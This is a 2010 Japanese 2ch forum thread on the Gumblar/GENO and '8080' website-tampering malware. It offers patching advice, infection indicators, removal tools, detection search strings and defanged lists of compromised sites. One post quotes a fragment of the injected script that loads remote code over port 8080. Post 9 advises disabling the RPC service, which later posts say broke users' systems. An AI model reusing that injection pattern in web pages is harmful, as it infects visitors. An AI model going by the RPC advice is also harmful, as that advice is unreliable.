【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2010/01/19(火) 10:38:38ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合ス2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0002名無しさん@お腹いっぱい。
2010/01/19(火) 10:41:55下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0003名無しさん@お腹いっぱい。
2010/01/19(火) 10:43:19■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
0004名無しさん@お腹いっぱい。
2010/01/19(火) 10:44:56■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
0005名無しさん@お腹いっぱい。
2010/01/19(火) 10:47:09メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
0006 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
2010/01/19(火) 10:49:01ミ ヽヽ、
,,,ミ ),,,,\
‐- ...,,__ カチカチ / ,,;;;;;;;;;; "''-、
~""''' ‐- ...,,__ /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
____,,,,,,,,,,,, -------/●);;;; ,;;''' 彡 l ,!
⌒ヽ、 _,,-‐‐‐f," ;; ;;; '' ;;;;彡三;_/ '' 彡 ノ ,,l
ヽ、八 \`(,,,,,,,,,イ''''ー、,;;;;;;; ((,,,,,.. (●>, __/'';;;;!
ヽ`---ー‐‐―‐ン '''-l ( ,.,., ,;;,, '';;;;;;,,,,/
 ̄ ̄ ̄ ̄ ̄ l メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._ | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
'''- .._ ____,,,,,,,,,,,,,,-''''' ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
/ , , "'''- .. f-'' ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/ / / / // (⌒ ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;; ;;;;;;;;;;;;;|
/ / / // `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;; ,,,, ;;;;;;;;;;l
0007名無しさん@お腹いっぱい。
2010/01/19(火) 10:49:07行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0008 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
2010/01/19(火) 10:49:44ミ ヽヽ、
,,,ミ ),,,,\
‐- ...,,__ カチカチ / ,,;;;;;;;;;; "''-、
~""''' ‐- ...,,__ /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
____,,,,,,,,,,,, -------/●);;;; ,;;''' 彡 l ,!
⌒ヽ、 _,,-‐‐‐f," ;; ;;; '' ;;;;彡三;_/ '' 彡 ノ ,,l
ヽ、八 \`(,,,,,,,,,イ''''ー、,;;;;;;; ((,,,,,.. (●>, __/'';;;;!
ヽ`---ー‐‐―‐ン '''-l ( ,.,., ,;;,, '';;;;;;,,,,/
 ̄ ̄ ̄ ̄ ̄ l メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._ | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
'''- .._ ____,,,,,,,,,,,,,,-''''' ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
/ , , "'''- .. f-'' ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/ / / / // (⌒ ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;; ;;;;;;;;;;;;;|
/ / / // `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;; ,,,, ;;;;;;;;;;l
0009名無しさん@お腹いっぱい。
2010/01/19(火) 10:50:51【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
0010名無しさん@お腹いっぱい。
2010/01/19(火) 10:52:12msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
0011名無しさん@お腹いっぱい。
2010/01/19(火) 10:54:020012名無しさん@お腹いっぱい。
2010/01/19(火) 11:18:14【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263822552/
0013あげ
2010/01/28(木) 21:06:06http://pc11.2ch.net/test/read.cgi/sec/1263822552/
からの続きで使用して下さい。
0014名無しさん@お腹いっぱい。
2010/01/28(木) 21:11:50>>10
最近の亜種には役に立ちそうもないが一応
【感染確認】
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
0015名無しさん@お腹いっぱい。
2010/01/28(木) 21:13:36■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/
0016名無しさん@お腹いっぱい。
2010/01/28(木) 21:14:42■ チェッカーサイト
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblarchecker.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
0017名無しさん@お腹いっぱい。
2010/01/28(木) 21:21:37メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けるよん
0018名無しさん@お腹いっぱい。
2010/01/28(木) 21:27:34ttp://www.so-net.ne.jp/security/
執筆している会社(株式会社 現代フォーラム)
http://www.gendai-forum.jp/page/sec.html
0019名無しさん@お腹いっぱい。
2010/01/28(木) 21:31:37----------
■Exceptionが「/*・・・*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。
■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)
■検索ワード:".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"
・やふー
ttp://search.yahoo.co.jp/search?p=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&ei=UTF-8&meta=fl%3D3&pstart=1&fr=top_ga1_sa&b=1
・えきさいと
ttp://www.excite.co.jp/search.gw?search=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&submit=%8C%9F%8D%F5&target=combined&look=excite_jp&sstype=excite_d
※Googleセンセイは捜索に向かない(やってみればわかる)
0020名無しさん@お腹いっぱい。
2010/01/28(木) 21:38:35びんぐ
ttp://www.bing.com/search?q=%22%2Ereplace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&filt=all
0021名無しさん@お腹いっぱい。
2010/01/28(木) 21:50:280022名無しさん@お腹いっぱい。
2010/01/28(木) 21:58:120023名無しさん@お腹いっぱい。
2010/01/28(木) 21:59:03>>9の2件は【ルータ】未導入の人用です。
前スレで、安易に手を出した初心者によるトラブルが続出しています。
(どうしても試したい人のための、症状例と救済レジストリ操作等)★保障なし★
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
0024名無しさん@お腹いっぱい。
2010/01/28(木) 22:18:398080系とか、GumblarにPCが感染すると具体的にどういう症状が出るの?
0025名無しさん@お腹いっぱい。
2010/01/28(木) 22:31:33別な犯罪グループに切り売りされたり(CODE1が一部売られて別なコードになってる)
悪事の片棒担がされたりインチキセキュリティソフト売りつけられたり。
0026名無しさん@お腹いっぱい。
2010/01/28(木) 22:35:24表面上何も異常がなくても
ある日突然警察がきてPC押収されるかもしれない
0027名無しさん@お腹いっぱい。
2010/01/28(木) 22:43:380028名無しさん@お腹いっぱい。
2010/01/28(木) 22:46:51大丈夫なんてとても言えない。
ブラウザのスクリプト切っておいてください。
あ、もちろんAdobeリーダーのJavascriptも切るんだよ。
0029名無しさん@お腹いっぱい。
2010/01/28(木) 22:54:320030名無しさん@お腹いっぱい。
2010/01/28(木) 22:59:47AdobeリーダーのJavascript、ブラウザでのPDF閲覧はチェック入れてない
IEだとJS関連が面倒そうだが信頼済みサイト機能使ってみるか
0031名無しさん@お腹いっぱい。
2010/01/28(木) 23:05:03それ以上のプラスアルファの対策は、各人の好みで自分の気が済むようにやればいい
0032名無しさん@お腹いっぱい。
2010/01/28(木) 23:25:30それとも自動で亜種が生まれ続けているの?
0033名無しさん@お腹いっぱい。
2010/01/28(木) 23:46:27OSの更新も忘れないでね!
0034名無しさん@お腹いっぱい。
2010/01/28(木) 23:47:20作ってるやつが目的を達成するまで続く
自動でうまれることはない
0035名無しさん@お腹いっぱい。
2010/01/29(金) 00:03:43じゃあ作ってるやつが捕まれば終息に向かうってことか
でも誰が作ったんだろうね?
出所から察するにロシアの悪質プログラマーなんだろうけど…
0036名無しさん@お腹いっぱい。
2010/01/29(金) 00:33:470037名無しさん@お腹いっぱい。
2010/01/29(金) 00:35:120038名無しさん@お腹いっぱい。
2010/01/29(金) 00:35:490039名無しさん@お腹いっぱい。
2010/01/29(金) 00:42:41似たようなのを別の誰かが作るかもしれないし
0040名無しさん@お腹いっぱい。
2010/01/29(金) 00:58:58アウトルックでプレビューウインドウを開いているとで感染
載っているアドレスにスパムメールを送る位だったのに・・・
今はもうアドビば修正したのかも知れないけど
アドビの1ヶ月パッチ放置によって
アクロバット使用者が感染し、その人のブログ、HPが改竄され、
その改竄されたHPを踏むと、今度はそのユーザーブログが改竄され
個人情報まで抜かれるしまつ。
10年後にはどんな凶悪なウイルスが出てくるんだろ・・・
0041名無しさん@お腹いっぱい。
2010/01/29(金) 01:00:37ドメイン手配するやつ、botのタスク受けるやつ
分業化してると想う、今はbotクラウドの構築段階じゃないかな
0042名無しさん@お腹いっぱい。
2010/01/29(金) 01:10:47起動不能に陥らせてたりしてたとおもうが
5,6年前のは可愛いのおおかったがな
0043名無しさん@お腹いっぱい。
2010/01/29(金) 01:18:12昔はアルプス一万尺が延々と流れてくるウイルスなんてのもあったみたいだね
AIがとまらないって漫画で見たことある
なんか、最近のウイルスはその漫画のラスボスのゼロスパイダーとかみたいなのが
現実に出てきてるみたいで怖い
0044名無しさん@お腹いっぱい。
2010/01/29(金) 01:27:200045名無しさん@お腹いっぱい。
2010/01/29(金) 01:28:17再発 /DEBUG/
例の上映会とこ。。。
前スレの人、またつーほーおながいします。
whois上流のとこ届かなかったみたいぽ。
0046名無しさん@お腹いっぱい。
2010/01/29(金) 01:58:25パスワードとか変えなかったのかよorz
0047名無しさん@お腹いっぱい。
2010/01/29(金) 02:24:50異常な状態にあることをわかってもらう必要がありそう
004845
2010/01/29(金) 02:26:06株式会社KDDIウェブコミュニケーションズの人ここ見てますかぁ〜
0049名無しさん@お腹いっぱい。
2010/01/29(金) 04:35:23■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。
■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。
8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)
0050名無しさん@お腹いっぱい。
2010/01/29(金) 05:42:02乙age
0051名無しさん@お腹いっぱい。
2010/01/29(金) 06:13:45ttp://isc.sans.org/diary.html?storyid=8104
0052名無しさん@お腹いっぱい。
2010/01/29(金) 07:14:390053名無しさん@お腹いっぱい。
2010/01/29(金) 07:28:410054名無しさん@お腹いっぱい。
2010/01/29(金) 07:33:530055名無しさん@お腹いっぱい。
2010/01/29(金) 07:58:03JREもセキュリティホールになってたのか・・・orz
油断できないな・・・
0056名無しさん@お腹いっぱい。
2010/01/29(金) 08:00:350057名無しさん@お腹いっぱい。
2010/01/29(金) 08:02:310058名無しさん@お腹いっぱい。
2010/01/29(金) 08:04:55ttp://www.rcsmovie.co●jp/
こんなん↓書いてありますけど?
一部のセキュリティソフトにおいて、
当ホームページへのアクセス遮断や、
感染警告の表示などが発生している様です。
早急な対応を試みておりますが、
じゅうぶんご注意ください。
0059名無しさん@お腹いっぱい。
2010/01/29(金) 08:06:14デジャビュ・・・いや既出だろそれ
0060名無しさん@お腹いっぱい。
2010/01/29(金) 09:11:390061名無しさん@お腹いっぱい。
2010/01/29(金) 09:20:58前スレ452と510で既出。
0062名無しさん@お腹いっぱい。
2010/01/29(金) 09:51:00北斗の更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか?
0063名無しさん@お腹いっぱい。
2010/01/29(金) 10:11:110064名無しさん@お腹いっぱい。
2010/01/29(金) 11:23:33ttp://kasim.kashima136●com/z19z00703/
みたいな/z△z00○○○/ってページがz1zからz19zまではあるし
(19x1000ページはあるんだろうね)
ttp://dingo.hichigosan●com/excessive-perspiration-japan/
ttp://dooon.konrei●org/foreign-exchange-japan/
みたいに最後にjapanのつくページとか山ほどあるよね。
どうにもならんよね
0065名無しさん@お腹いっぱい。
2010/01/29(金) 11:27:27前スレから転載
----------
669 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:49:48
素人はRPCを絶対いじるな
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
----------
ハ,,..,,ハ
/;;・ω・;;ヽ
. (;( ^^^ );)
`'ー---‐´
トトロイ
(2010〜)
0066名無しさん@お腹いっぱい。
2010/01/29(金) 11:32:180067名無しさん@お腹いっぱい。
2010/01/29(金) 11:38:48tp://bb21.b2c-21●com以下の階層のページ 0件
tp://kasim.kashima136●com以下の階層のページ 31件
↓
/z19z00701
/z19z00703
/z19z00705
/z19z00707
/z19z00710
/danjiki/
/hair/
/bust/
/bland/
面倒だから、以下略とす
0068名無しさん@お腹いっぱい。
2010/01/29(金) 11:48:28こーゆーのどーすればいーのさ
0069名無しさん@お腹いっぱい。
2010/01/29(金) 11:51:140070名無しさん@お腹いっぱい。
2010/01/29(金) 11:53:01ソースみてみ
0071名無しさん@お腹いっぱい。
2010/01/29(金) 11:54:57DEBUGじゃない...
;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
http://apopo●apparelarc-xml●org/z1z00712/
0072名無しさん@お腹いっぱい。
2010/01/29(金) 13:09:27再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。
.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス
昨日のDEBUGは本当にDEBUGだったのか・・・
0073名無しさん@お腹いっぱい。
2010/01/29(金) 13:55:420075名無しさん@お腹いっぱい。
2010/01/29(金) 14:29:46以前に>>9を見てポート445を閉じてしまったのですが
元に戻す場合には「スタートアップ」の種類を何に変更すればいいのでしょうか?
0076名無しさん@お腹いっぱい。
2010/01/29(金) 14:37:060077名無しさん@お腹いっぱい。
2010/01/29(金) 15:52:09うちもシステムになっているよ@XP SP2
0079名無しさん@お腹いっぱい。
2010/01/29(金) 16:35:508080系ってJREを利用してるの?
adobeの更新がどうのこうの話題になってたけど。
0080名無しさん@お腹いっぱい。
2010/01/29(金) 16:43:12使う。Java6Update17未満だとやられる。
WindowsのもあるけどこれはWindowsUpdateで阻止できるので脅威ではない。
0081名無しさん@お腹いっぱい。
2010/01/29(金) 17:35:57古いの削除しないとヤバイ?
0082名無しさん@お腹いっぱい。
2010/01/29(金) 17:35:59そこまで新しくなくても今のところは大丈夫
ダメなのは
JRE 6 Update 11未満
JRE 5.0 Update 17未満
JRE 1.4.2_19未満
あと8080系はクリスマス頃から未修整だったAdobe Readerの脆弱性を使うようになった。
ほかの攻撃内容は帰ってきたGumblar並みだったのに、
ここまでひどいことになったのはこの2つのおかげだと思う。
0083名無しさん@お腹いっぱい。
2010/01/29(金) 17:38:560084名無しさん@お腹いっぱい。
2010/01/29(金) 17:55:07ttps://www.ccc.go.jp/detail/web/
企業などで特定のバージョンのJREを必要とする場合はありますが、
それ以外の場合では旧バージョンをアンインストールすることをお薦めします
0085名無しさん@お腹いっぱい。
2010/01/29(金) 18:01:37凸完了
0086名無しさん@お腹いっぱい。
2010/01/29(金) 18:02:590087名無しさん@お腹いっぱい。
2010/01/29(金) 18:05:560088名無しさん@お腹いっぱい。
2010/01/29(金) 18:08:56これは入ってないってことでいいの?
ttp://www.java.com/ja/で確認したんだけど良く分からん
0089名無しさん@お腹いっぱい。
2010/01/29(金) 18:13:07俺のところでは Java(TM) 6 Update 17 となってるな
0090名無しさん@お腹いっぱい。
2010/01/29(金) 18:16:14がインストールされてます、ADOBE製品はFLASHPLAYER10
しか使ってないんですが一応の対策はこれでOKですか?
ウイルスソフトはNIS2009使ってます
009188
2010/01/29(金) 18:28:04「プログラムの追加と削除」リストを名前順に並べて
I-O DATA
Microsoft (C++等四つほどあり)
NVIDIA(ドライバ)
となっています
Javaの文字は無いのでインストールされてないようです
>>7の他の対処法でJREだけやっていなかったのでとりあえず安心できます
ありがとうございました
0092名無しさん@お腹いっぱい。
2010/01/29(金) 18:28:07バージョンチェックは↓でどうぞ
ttp://jvndb.jvn.jp/apis/myjvn/#VCCHECK
0094へたれ発掘屋
2010/01/29(金) 18:31:08※名無し最新型は「.ru:X」と記す
沖縄情報ガイド(.ru:X)
tp://www●okiinfo●com/
※サイト内全域?
価格比較 GIOS(GNU GPL)*再改竄*
tp://shop●relax-living●net/bike11/
※トップページは絶賛崩壊中
にしてもGNU GPLって・・・orz
中古車情報の朝日オート(DEBUG)
tp://horizon●f00●jp/
※通報済、未対応
ジェイティメタル(CODE1)
tp://www●jtmetal●jp/data/index2●html
漢方 コバヤシ薬局(.ru:X、DEBUG)
tp://www●sbest-drug●com/
つーほヨロ・・
0095名無しさん@お腹いっぱい。
2010/01/29(金) 18:32:24>>2で最新版(Java(TM)6Update18)にすれば、
・「JREを使われる穴がふさがるよ」なのか
・「JREが新しくなって穴がふさがるよ」なのかどっちなんだろう…
こないだアップデートしてJava(TM)6Update18にしたが
Java (TM) SE Runtime Environment Update 1は特に変化がない…。
確認ページでも最新版がすでにあるといわれる…
JREはいらないなら削除してもいいのかなぁ
0096名無しさん@お腹いっぱい。
2010/01/29(金) 18:48:17009790
2010/01/29(金) 19:01:58JAVA(TM)6 UPDATE 18入れました
0098名無しさん@お腹いっぱい。
2010/01/29(金) 19:02:31>何らかの法則、又はランダムで生成してるような希ガス
さすが田宮さんw
0099名無しさん@お腹いっぱい。
2010/01/29(金) 19:17:00コメント無しは固定だったmegaidとDEBUGが可変文字列に変わったようなものだから
ru:XよりDEBUG改とかにした方が特徴的に分かり易くないかな。
0100名無しさん@お腹いっぱい。
2010/01/29(金) 19:22:200101名無しさん@お腹いっぱい。
2010/01/29(金) 19:32:14結局固定文字列は「8080」くらいしか残ってなかったり
010245
2010/01/29(金) 19:42:06沖縄情報
ジェイ・ティ・メタル
漢方 コバヤシ薬局
以上whoisよりめるぽしました。
> 崩壊中
ひょっとして管理者とクラッカーの上書き合戦だったりして。。。
0103名無しさん@お腹いっぱい。
2010/01/29(金) 20:12:510104名無しさん@お腹いっぱい。
2010/01/29(金) 20:23:06亜種や変種とした方が語弊がないと思う。
0105名無しさん@お腹いっぱい。
2010/01/29(金) 20:30:430106名無しさん@お腹いっぱい。
2010/01/29(金) 20:41:24こんなことに...
管理用端末で余所のwebページ閲覧するなよ
毎日パス変えとけボケ
0107名無しさん@お腹いっぱい。
2010/01/29(金) 21:29:03ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2009/spring/chapter07/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter06/index●html
